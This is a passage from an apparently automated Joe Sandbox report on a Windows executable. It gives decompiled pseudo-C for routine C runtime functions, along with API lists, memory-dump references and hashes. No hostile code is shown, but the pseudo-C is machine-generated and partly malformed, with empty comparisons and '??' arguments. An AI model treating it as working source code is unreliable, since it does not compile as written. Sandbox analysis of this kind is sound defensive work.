				E00007FF77FF7DA8E48CC(_t60, _t89,  *(__r9 + 0x20)); // executed
				 *(__r9 + 0x28) = _t79;
				 *(__r9 + 0x14) =  *(__r9 + 0x14) & 0x00000000;
				if (_v80 != 0) goto 0xda8e4822;
				_t47 = _v76;
				if (_t47 - 0x7fffffff > 0) goto 0xda8e4822;
				 *(__r9 + 0x14) = _t47;
				goto 0xda8e48a6;
				E00007FF77FF7DA8E4394(_t79);
				 *_t79 = 0x84;
				goto 0xda8e4846;
				_t25 = _t89 - 2; // -2
				if (_t25 - r15d <= 0) goto 0xda8e4859;
				if (_t60 != 0) goto 0xda8e484a;
				E00007FF77FF7DA8E4394(_t79);
				 *_t79 = 9;
				goto 0xda8e48a9;
				_t61 = GetLastError();
				E00007FF77FF7DA8E4308(_t61, _t79, _t89);
				goto 0xda8e4846;
				 *((intOrPtr*)(__r9 + 8)) = r15w;
				 *((intOrPtr*)(__r9 + 0x10)) = r14d;
				 *__r9 = r14d;
				_t55 =  ==  ? 0x2000 : 0x1000;
				 *((short*)(__r9 + 6)) =  ==  ? 0x2000 : 0x1000;
				if (_t61 == 2) goto 0xda8e48a6;
				_v128 = _v128 & 0x00000000;
				_v136 =  &_v120;
				r9d = 0;
				r8d = 0;
				if (PeekNamedPipe(??, ??, ??, ??, ??, ??) == 0) goto 0xda8e48a6;
				 *(__r9 + 0x14) = _v120;
				return E00007FF77FF7DA8DACF0(r15b, _v120, _v56 ^ _t102 - 0x00000080);
			}

0x7ff7da8e4724
0x7ff7da8e473a
0x7ff7da8e4741
0x7ff7da8e4744
0x7ff7da8e4754
0x7ff7da8e4757
0x7ff7da8e475f
0x7ff7da8e4765
0x7ff7da8e476c
0x7ff7da8e4772
0x7ff7da8e477a
0x7ff7da8e477c
0x7ff7da8e478e
0x7ff7da8e4797
0x7ff7da8e4799
0x7ff7da8e479c
0x7ff7da8e479e
0x7ff7da8e47aa
0x7ff7da8e47ae
0x7ff7da8e47b1
0x7ff7da8e47b5
0x7ff7da8e47b9
0x7ff7da8e47c1
0x7ff7da8e47c7
0x7ff7da8e47ca
0x7ff7da8e47d8
0x7ff7da8e47dc
0x7ff7da8e47e8
0x7ff7da8e47ec
0x7ff7da8e47f5
0x7ff7da8e47f9
0x7ff7da8e47fd
0x7ff7da8e4802
0x7ff7da8e4806
0x7ff7da8e480e
0x7ff7da8e4810
0x7ff7da8e4818
0x7ff7da8e481a
0x7ff7da8e481d
0x7ff7da8e4822
0x7ff7da8e4827
0x7ff7da8e482d
0x7ff7da8e482f
0x7ff7da8e4835
0x7ff7da8e4839
0x7ff7da8e483b
0x7ff7da8e4840
0x7ff7da8e4848
0x7ff7da8e4850
0x7ff7da8e4852
0x7ff7da8e4857
0x7ff7da8e485c
0x7ff7da8e4866
0x7ff7da8e486f
0x7ff7da8e4872
0x7ff7da8e4876
0x7ff7da8e487a
0x7ff7da8e487c
0x7ff7da8e4886
0x7ff7da8e488b
0x7ff7da8e4891
0x7ff7da8e489e
0x7ff7da8e48a3
0x7ff7da8e48cb

APIs

GetFileType.KERNELBASE ref: 00007FF7DA8E4757
GetFileInformationByHandle.KERNELBASE ref: 00007FF7DA8E47B9
GetLastError.KERNEL32 ref: 00007FF7DA8E484A
PeekNamedPipe.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00007FF7DA8E465C), ref: 00007FF7DA8E4896

Memory Dump Source

Source File: 00000000.00000002.339090214.00007FF7DA8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7DA8D0000, based on PE: true

Associated: 00000000.00000002.339080100.00007FF7DA8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339117101.00007FF7DA8FA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339131229.00007FF7DA90D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339131229.00007FF7DA91C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339173734.00007FF7DA91E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7da8d0000_4Vp6Xc8SFr.jbxd

Similarity

API ID: File$ErrorHandleInformationLastNamedPeekPipeType
String ID:
API String ID: 2780335769-0
Opcode ID: d63e1d5f4f664f7d448d3fdfa223882025be55e07d60f456332d5d4c6abb6cae
Instruction ID: fa749ce9de02eecb2957cc2eb35038be2d99fd49411a21dd05200126516d2b71
Opcode Fuzzy Hash: d63e1d5f4f664f7d448d3fdfa223882025be55e07d60f456332d5d4c6abb6cae
Instruction Fuzzy Hash: 0351C022E082928AF711EFB1D4403BCB3A1BB64B58F904536DE1D5768ADF3ED5608320

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7DA8DAE5C Relevance: 6.1, APIs: 4, Instructions: 94
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E00007FF77FF7DA8DAE5C(intOrPtr* __rax, long long __rbx, void* __r8, long long _a8) {
				char _v24;
				void* _t8;
				void* _t9;
				void* _t10;
				signed short _t20;
				void* _t22;
				void* _t26;
				intOrPtr _t35;
				intOrPtr* _t54;
				intOrPtr* _t55;

				_t56 = __rbx;
				_t54 = __rax;
				_a8 = __rbx;
				_t8 = E00007FF77FF7DA8DB2CC(1); // executed
				if (_t8 == 0) goto 0xda8dafa8;
				dil = 0;
				_v24 = dil;
				_t9 = E00007FF77FF7DA8DB290();
				_t35 =  *0xda91c560; // 0x2
				if (_t35 == 1) goto 0xda8dafb3;
				if (_t35 != 0) goto 0xda8daee4;
				 *0xda91c560 = 1;
				_t10 = E00007FF77FF7DA8E85C4(__rbx, 0xda8fa468, 0xda8fa4a8); // executed
				if (_t10 == 0) goto 0xda8daec5;
				goto 0xda8daf9d;
				E00007FF77FF7DA8E8580(_t56, 0xda8fa450, 0xda8fa460); // executed
				 *0xda91c560 = 2;
				goto 0xda8daeec;
				dil = 1;
				_v24 = dil;
				E00007FF77FF7DA8DB5E4(E00007FF77FF7DA8DB43C(_t9, 0xda8fa460));
				if ( *_t54 == 0) goto 0xda8daf1f;
				if (E00007FF77FF7DA8DB3A4(_t54, _t54) == 0) goto 0xda8daf1f;
				r8d = 0;
				_t55 =  *_t54;
				E00007FF77FF7DA8DB5EC( *0xda8fa428());
				if ( *_t55 == 0) goto 0xda8daf41;
				if (E00007FF77FF7DA8DB3A4(_t55, _t55) == 0) goto 0xda8daf41;
				E00007FF77FF7DA8E88D4( *_t55);
				_t20 = E00007FF77FF7DA8DB748(0xda8fa460);
				E00007FF77FF7DA8E852C();
				r9d = _t20 & 0x0000ffff;
				_t72 = _t55;
				_t22 = E00007FF77FF7DA8D1000(_t55); // executed
				if (E00007FF77FF7DA8DB78C(_t55) == 0) goto 0xda8dafbd;
				if (dil != 0) goto 0xda8daf77;
				E00007FF77FF7DA8E88B8(0x7ff7da8d0000, 0xda8fa460, _t55);
				E00007FF77FF7DA8DB460(1, 0);
				_t26 = _t22;
				if (E00007FF77FF7DA8DB78C(_t55) == 0) goto 0xda8dafc5;
				if (_v24 != 0) goto 0xda8daf9b;
				E00007FF77FF7DA8E88A8(0x7ff7da8d0000, 0xda8fa460, _t72);
				return _t26;
			}

0x7ff7da8dae5c
0x7ff7da8dae5c
0x7ff7da8dae5c
0x7ff7da8dae6b
0x7ff7da8dae72
0x7ff7da8dae78
0x7ff7da8dae7b
0x7ff7da8dae80
0x7ff7da8dae87
0x7ff7da8dae90
0x7ff7da8dae98
0x7ff7da8dae9a
0x7ff7da8daeb2
0x7ff7da8daeb9
0x7ff7da8daec0
0x7ff7da8daed3
0x7ff7da8daed8
0x7ff7da8daee2
0x7ff7da8daee4
0x7ff7da8daee7
0x7ff7da8daef3
0x7ff7da8daeff
0x7ff7da8daf0b
0x7ff7da8daf0d
0x7ff7da8daf16
0x7ff7da8daf1f
0x7ff7da8daf2b
0x7ff7da8daf37
0x7ff7da8daf3c
0x7ff7da8daf41
0x7ff7da8daf49
0x7ff7da8daf4e
0x7ff7da8daf51
0x7ff7da8daf5d
0x7ff7da8daf6b
0x7ff7da8daf70
0x7ff7da8daf72
0x7ff7da8daf7b
0x7ff7da8daf80
0x7ff7da8daf8d
0x7ff7da8daf94
0x7ff7da8daf96
0x7ff7da8dafa7

APIs

__scrt_initialize_crt.LIBCMT ref: 00007FF7DA8DAE6B

Part of subcall function 00007FF7DA8DB2CC: __scrt_dllmain_crt_thread_attach.LIBCMT ref: 00007FF7DA8DB2EE

__scrt_acquire_startup_lock.LIBCMT ref: 00007FF7DA8DAE80
__scrt_release_startup_lock.LIBCMT ref: 00007FF7DA8DAEEE
__scrt_get_show_window_mode.LIBCMT ref: 00007FF7DA8DAF41

Memory Dump Source

Source File: 00000000.00000002.339090214.00007FF7DA8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7DA8D0000, based on PE: true

Associated: 00000000.00000002.339080100.00007FF7DA8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339117101.00007FF7DA8FA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339131229.00007FF7DA90D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339131229.00007FF7DA91C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339173734.00007FF7DA91E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7da8d0000_4Vp6Xc8SFr.jbxd

Similarity

API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_initialize_crt__scrt_release_startup_lock
String ID:
API String ID: 1452418845-0
Opcode ID: f9463a67af73ecdf476021b69832aa8e37fe24f2495d1c1145be39d635d83d96
Instruction ID: 5f6afc38eacbdcbb3639f0b17e4d601ddf6e86da769ec44f4493976a6ad2f91a
Opcode Fuzzy Hash: f9463a67af73ecdf476021b69832aa8e37fe24f2495d1c1145be39d635d83d96
Instruction Fuzzy Hash: 17313621A0924789FE16BB2494153BDE291BF90754FD848F7ED0E472D3DE2DA9248370

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7DA8E45D0 Relevance: 6.1, APIs: 4, Instructions: 90fileCOMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF7DA8E45FD
CreateFileW.KERNELBASE ref: 00007FF7DA8E463C
CloseHandle.KERNEL32 ref: 00007FF7DA8E4671

Memory Dump Source

Source File: 00000000.00000002.339090214.00007FF7DA8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7DA8D0000, based on PE: true

Associated: 00000000.00000002.339080100.00007FF7DA8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339117101.00007FF7DA8FA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339131229.00007FF7DA90D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339131229.00007FF7DA91C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339173734.00007FF7DA91E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7da8d0000_4Vp6Xc8SFr.jbxd

Similarity

API ID: CloseCreateFileHandle_invalid_parameter_noinfo
String ID:
API String ID: 1279662727-0
Opcode ID: d65c13593cf6935a0391c88ec2fb83f7f07440e81e11b809fa8edf9c6efc289f
Instruction ID: 30780369c51df8c862a2d67f19625eec74dc7397d71dd6972650af86e01b571f
Opcode Fuzzy Hash: d65c13593cf6935a0391c88ec2fb83f7f07440e81e11b809fa8edf9c6efc289f
Instruction Fuzzy Hash: 9D419362E18782C3F715AB21950036DA360FBA5764F909376DE9C03AD2DF6EA6F08710

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7DA8E87D8 Relevance: 4.5, APIs: 3, Instructions: 14
COMMON

Download Yara Rule

C-Code - Quality: 28%

			E00007FF77FF7DA8E87D8() {
				void* _t1;
				void* _t6;
				void* _t11;

				_t1 = E00007FF77FF7DA8E880C(); // executed
				if (_t1 == 0) goto 0xda8e87fa;
				GetCurrentProcess();
				E00007FF77FF7DA8E8830(TerminateProcess(??, ??), _t6, _t11);
				ExitProcess(??);
			}

0x7ff7da8e87e0
0x7ff7da8e87e7
0x7ff7da8e87e9
0x7ff7da8e87fc
0x7ff7da8e8803

APIs

GetCurrentProcess.KERNEL32(?,?,?,00007FF7DA8E87D4), ref: 00007FF7DA8E87E9
TerminateProcess.KERNEL32(?,?,?,00007FF7DA8E87D4), ref: 00007FF7DA8E87F4
ExitProcess.KERNEL32 ref: 00007FF7DA8E8803

Memory Dump Source

Source File: 00000000.00000002.339090214.00007FF7DA8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7DA8D0000, based on PE: true

Associated: 00000000.00000002.339080100.00007FF7DA8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339117101.00007FF7DA8FA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339131229.00007FF7DA90D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339131229.00007FF7DA91C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339173734.00007FF7DA91E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7da8d0000_4Vp6Xc8SFr.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: 4ddb213536c4213914e1d39c5867685a565ce616895cde70da5e96fb304fa213
Instruction ID: e6fbdfe6263431900afece4bc74d2333f75b3e5c65a8862671ffc359b65bf2ec
Opcode Fuzzy Hash: 4ddb213536c4213914e1d39c5867685a565ce616895cde70da5e96fb304fa213
Instruction Fuzzy Hash: BAD09E10F1874786FA163B715C9517DD2117FA8755FC418BACC5B06393CD2EB5BD8220

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7DA8DF2EC Relevance: 3.2, APIs: 2, Instructions: 177
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E00007FF77FF7DA8DF2EC(intOrPtr* __rax, long long __rbx, void* __rcx, void* __rdx, void* __r8, long long __r9, long long _a8, long long _a32, void* _a40) {

				_a8 = __rbx;
				_a32 = __r9;
				if (__r8 == 0) goto 0xda8df335;
				if (__r9 == 0) goto 0xda8df335;
				if (__rcx != 0) goto 0xda8df34c;
				E00007FF77FF7DA8E4394(__rax);
				 *__rax = 0x16;
				E00007FF77FF7DA8E9D00();
				return 0;
			}

0x7ff7da8df2ec
0x7ff7da8df2f1
0x7ff7da8df319
0x7ff7da8df31e
0x7ff7da8df323
0x7ff7da8df325
0x7ff7da8df32a
0x7ff7da8df330
0x7ff7da8df34b

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF7DA8DF330
_invalid_parameter_noinfo.LIBCMT ref: 00007FF7DA8DF427

Memory Dump Source

Source File: 00000000.00000002.339090214.00007FF7DA8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7DA8D0000, based on PE: true

Associated: 00000000.00000002.339080100.00007FF7DA8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339117101.00007FF7DA8FA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339131229.00007FF7DA90D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339131229.00007FF7DA91C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339173734.00007FF7DA91E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7da8d0000_4Vp6Xc8SFr.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 93d406eb751f86c607dc13eaaa054d8705ba3ff266a8700b2758b39221051539
Instruction ID: cc2b28c19d126d2a3c320a2fd12da7a28884a5951ddb16e3dcaa9219fb11be01
Opcode Fuzzy Hash: 93d406eb751f86c607dc13eaaa054d8705ba3ff266a8700b2758b39221051539
Instruction Fuzzy Hash: 9251EA61B0A28289FE2AAD25D50067EE591BF40B64FCC4676DD6C477C7EE3CD8219720

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7DA8DAD70 Relevance: 3.1, APIs: 2, Instructions: 63
COMMON

Download Yara Rule

C-Code - Quality: 67%

			E00007FF77FF7DA8DAD70(intOrPtr* __rax) {
				void* __rbx;
				void* _t2;
				intOrPtr _t6;
				void* _t20;
				intOrPtr* _t32;
				void* _t33;
				void* _t34;
				void* _t37;

				_t32 = __rax;
				E00007FF77FF7DA8E7B24(_t2, 2);
				E00007FF77FF7DA8E56EC(E00007FF77FF7DA8DB594(), __rax, _t34);
				_t6 = E00007FF77FF7DA8D53C0();
				E00007FF77FF7DA8E8A70(_t6);
				 *_t32 = _t6;
				if (E00007FF77FF7DA8DB318(1, _t32) == 0) goto 0xda8dae1b;
				E00007FF77FF7DA8DB84C(_t33);
				E00007FF77FF7DA8DB4C8(E00007FF77FF7DA8DB318(1, _t32), _t32);
				if (E00007FF77FF7DA8E7DBC(E00007FF77FF7DA8DB58C(), _t32, _t33, E00007FF77FF7DA8DB890, _t37) != 0) goto 0xda8dae1b;
				E00007FF77FF7DA8DB59C();
				if (E00007FF77FF7DA8DB5D8() == 0) goto 0xda8dade3;
				E00007FF77FF7DA8D3250(E00007FF77FF7DA8D3250(E00007FF77FF7DA8E7B90(_t13, 0x7ff7da8d53c0)));
				E00007FF77FF7DA8E89D0(E00007FF77FF7DA8D53C0(), _t32, 0x7ff7da8d53c0);
				if (E00007FF77FF7DA8DB5B0() == 0) goto 0xda8dae07; // executed
				0xda8e8524(); // executed
				_t20 = E00007FF77FF7DA8D53C0();
				0xda8db784();
				if (_t20 != 0) goto 0xda8dae1b;
				return _t20;
			}

0x7ff7da8dad70
0x7ff7da8dad7b
0x7ff7da8dad87
0x7ff7da8dad8c
0x7ff7da8dad93
0x7ff7da8dad9d
0x7ff7da8dada6
0x7ff7da8dada8
0x7ff7da8dadb4
0x7ff7da8dadc7
0x7ff7da8dadc9
0x7ff7da8dadd5
0x7ff7da8dade8
0x7ff7da8dadf4
0x7ff7da8dae00
0x7ff7da8dae02
0x7ff7da8dae07
0x7ff7da8dae0c
0x7ff7da8dae13
0x7ff7da8dae1a

APIs

_set_fmode.LIBCMT ref: 00007FF7DA8DAD87
_RTC_Initialize.LIBCMT ref: 00007FF7DA8DADA8

Part of subcall function 00007FF7DA8E7DBC: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7DA8E7DEE

Memory Dump Source

Source File: 00000000.00000002.339090214.00007FF7DA8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7DA8D0000, based on PE: true

Associated: 00000000.00000002.339080100.00007FF7DA8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339117101.00007FF7DA8FA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339131229.00007FF7DA90D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339131229.00007FF7DA91C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339173734.00007FF7DA91E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7da8d0000_4Vp6Xc8SFr.jbxd

Similarity

API ID: Initialize_invalid_parameter_noinfo_set_fmode
String ID:
API String ID: 3548387204-0
Opcode ID: 515fc38de06c00e47728ce5206e52c4fad1dabcef5aec862fceb92a3c70ea36f
Instruction ID: 8a6894f4f406204d3d6b2b42bf3b35df5f12951f50722dfb611e49dc07561f46
Opcode Fuzzy Hash: 515fc38de06c00e47728ce5206e52c4fad1dabcef5aec862fceb92a3c70ea36f
Instruction Fuzzy Hash: F3116910E082438AFE5A77B1445A2BDC1A17F95361FC808B7ED1D872C3EE5DAA708776

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7DA8E9F78 Relevance: 3.1, APIs: 2, Instructions: 59
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E00007FF77FF7DA8E9F78(signed int __ecx, void* __edx, void* __edi, void* __eflags, void* __rax, long long __rbx, void* __rdx, long long __rsi, long long _a8, long long _a16) {
				void* __rdi;
				int _t22;
				long _t29;
				intOrPtr _t51;
				void* _t65;

				_a8 = __rbx;
				_a16 = __rsi;
				_t65 = __rdx;
				E00007FF77FF7DA8E6E48(__edi, __rax);
				if (__rax != 0xffffffff) goto 0xda8e9f9e;
				goto 0xda8e9ff8;
				_t51 =  *0xda91ca20; // 0x25976db6280
				if (__edi != 1) goto 0xda8e9fb8;
				if (( *(_t51 + 0xc8) & dil) != 0) goto 0xda8e9fc5;
				if (__edi != 2) goto 0xda8e9fdc;
				if (( *(_t51 + 0x80) & 0x00000001) == 0) goto 0xda8e9fdc;
				E00007FF77FF7DA8E6E48(2, _t51);
				E00007FF77FF7DA8E6E48(1, _t51);
				if (_t51 == _t51) goto 0xda8e9f9a;
				E00007FF77FF7DA8E6E48(__edi, _t51);
				_t22 = FindCloseChangeNotification(??); // executed
				if (_t22 != 0) goto 0xda8e9f9a;
				_t29 = GetLastError();
				E00007FF77FF7DA8E6D8C(_t23, _t29, __edi, _t51, __ecx, _t65);
				 *((char*)( *((intOrPtr*)(0xda91ca20 + (__ecx >> 6) * 8)) + 0x38 + (__ecx + __ecx * 8) * 8)) = 0;
				if (_t29 == 0) goto 0xda8ea033;
				E00007FF77FF7DA8E4350(_t29, _t65);
				goto 0xda8ea035;
				return 0;
			}

0x7ff7da8e9f78
0x7ff7da8e9f7d
0x7ff7da8e9f8a
0x7ff7da8e9f8f
0x7ff7da8e9f98
0x7ff7da8e9f9c
0x7ff7da8e9f9e
0x7ff7da8e9fad
0x7ff7da8e9fb6
0x7ff7da8e9fba
0x7ff7da8e9fc3
0x7ff7da8e9fc5
0x7ff7da8e9fd2
0x7ff7da8e9fda
0x7ff7da8e9fde
0x7ff7da8e9fe6
0x7ff7da8e9fee
0x7ff7da8e9ff6
0x7ff7da8e9ffa
0x7ff7da8ea01b
0x7ff7da8ea022
0x7ff7da8ea029
0x7ff7da8ea031
0x7ff7da8ea044

APIs

FindCloseChangeNotification.KERNELBASE(?,?,?,00007FF7DA8E9DF5,?,?,00000000,00007FF7DA8E9EAA), ref: 00007FF7DA8E9FE6
GetLastError.KERNEL32(?,?,?,00007FF7DA8E9DF5,?,?,00000000,00007FF7DA8E9EAA), ref: 00007FF7DA8E9FF0

Memory Dump Source

Source File: 00000000.00000002.339090214.00007FF7DA8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7DA8D0000, based on PE: true

Associated: 00000000.00000002.339080100.00007FF7DA8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339117101.00007FF7DA8FA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339131229.00007FF7DA90D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339131229.00007FF7DA91C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339173734.00007FF7DA91E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7da8d0000_4Vp6Xc8SFr.jbxd

Similarity

API ID: ChangeCloseErrorFindLastNotification
String ID:
API String ID: 1687624791-0
Opcode ID: ad6594b361ddccf81c01187a23df810a25d25f951f7e4b92e7c3b860c5a51574
Instruction ID: 61657c8dfa15de9a9dde17b6f7b24b638b75a29f25f6da6806214ff180e29e27
Opcode Fuzzy Hash: ad6594b361ddccf81c01187a23df810a25d25f951f7e4b92e7c3b860c5a51574
Instruction Fuzzy Hash: 1221C511F18643C4FA527761D48427DE2927FA4BA0FD442B7EE1E472C3CE6EE5654320

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7DA8EB554 Relevance: 3.0, APIs: 2, Instructions: 46
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 37%

			E00007FF77FF7DA8EB554(signed int __ecx, void* __edx, void* __edi, void* __eflags, void* __rax, long long __rbx, void* __rdx, long long __rsi, long long __rbp, void* __r9, long long _a8, long long _a16, long long _a24) {
				intOrPtr _v24;
				int _t22;
				void* _t24;

				_a8 = __rbx;
				_a16 = __rbp;
				_a24 = __rsi;
				E00007FF77FF7DA8E6E48(__edi, __rax);
				if (__rax != 0xffffffff) goto 0xda8eb592;
				 *((char*)(__r9 + 0x30)) = 1;
				 *((intOrPtr*)(__r9 + 0x2c)) = 9;
				goto 0xda8eb5e8;
				r9d = r8d;
				_t22 = SetFilePointerEx(??, ??, ??, ??); // executed
				if (_t22 != 0) goto 0xda8eb5bc;
				_t24 = E00007FF77FF7DA8E4350(GetLastError(), __r9);
				goto 0xda8eb58c;
				if (_v24 == 0xffffffff) goto 0xda8eb58c;
				 *( *((intOrPtr*)(0xda91ca20 + (__ecx >> 6) * 8)) + 0x38 + (__ecx + __ecx * 8) * 8) =  *( *((intOrPtr*)(0xda91ca20 + (__ecx >> 6) * 8)) + 0x38 + (__ecx + __ecx * 8) * 8) & 0x000000fd;
				return _t24;
			}

0x7ff7da8eb554
0x7ff7da8eb559
0x7ff7da8eb55e
0x7ff7da8eb576
0x7ff7da8eb57f
0x7ff7da8eb581
0x7ff7da8eb585
0x7ff7da8eb590
0x7ff7da8eb592
0x7ff7da8eb5a0
0x7ff7da8eb5a8
0x7ff7da8eb5b5
0x7ff7da8eb5ba
0x7ff7da8eb5c5
0x7ff7da8eb5e3
0x7ff7da8eb5fc

APIs

SetFilePointerEx.KERNELBASE(?,?,?,?,00000000,00007FF7DA8EB6ED), ref: 00007FF7DA8EB5A0
GetLastError.KERNEL32(?,?,?,?,00000000,00007FF7DA8EB6ED), ref: 00007FF7DA8EB5AA

Memory Dump Source

Source File: 00000000.00000002.339090214.00007FF7DA8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7DA8D0000, based on PE: true

Associated: 00000000.00000002.339080100.00007FF7DA8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339117101.00007FF7DA8FA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339131229.00007FF7DA90D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339131229.00007FF7DA91C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339173734.00007FF7DA91E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7da8d0000_4Vp6Xc8SFr.jbxd

Similarity

API ID: ErrorFileLastPointer
String ID:
API String ID: 2976181284-0
Opcode ID: a0c231647b24d9852de70eff871a2b210e81a6ebcaaf717043b768b8d22a8b00
Instruction ID: c36d954c3d9f19d22b379cee82d245db5af9bf9fd274714dfeb0e2c9de0ff986
Opcode Fuzzy Hash: a0c231647b24d9852de70eff871a2b210e81a6ebcaaf717043b768b8d22a8b00
Instruction Fuzzy Hash: E511C461618B4281EA11AB25E40406DF361BB94BF4FD48772EE7D477DACF3DD1648740

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7DA8E48CC Relevance: 3.0, APIs: 2, Instructions: 40timeCOMMON

Download Yara Rule

APIs

FileTimeToSystemTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7DA8E47E1), ref: 00007FF7DA8E48FF
SystemTimeToTzSpecificLocalTime.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7DA8E47E1), ref: 00007FF7DA8E4915

Memory Dump Source

Source File: 00000000.00000002.339090214.00007FF7DA8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7DA8D0000, based on PE: true

Associated: 00000000.00000002.339080100.00007FF7DA8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339117101.00007FF7DA8FA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339131229.00007FF7DA90D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339131229.00007FF7DA91C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.339173734.00007FF7DA91E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7da8d0000_4Vp6Xc8SFr.jbxd

Similarity

API ID: Time$System$FileLocalSpecific
String ID:
API String ID: 1707611234-0
Opcode ID: c2acd781a860b2283c906d38b22be488d7b82ddd1467d047cf226228e824bc51
Instruction ID: 839a22c6f0754ecc247b6a9f4fa9e84619222f1b0703e54b2ec35c1e5de43d11
Opcode Fuzzy Hash: c2acd781a860b2283c906d38b22be488d7b82ddd1467d047cf226228e824bc51
Instruction Fuzzy Hash: 4711602160C653C1FA54AB14A44113EF760FB95771FE00276EAAD819E9EF2ED564CB20

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7DA8E68D4 Relevance: 3.0, APIs: 2, Instructions: 35timeCOMMONLIBRARYCODE

Download Yara Rule

APIs

FileTimeToSystemTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF7DA8E6751), ref: 00007FF7DA8E68F7
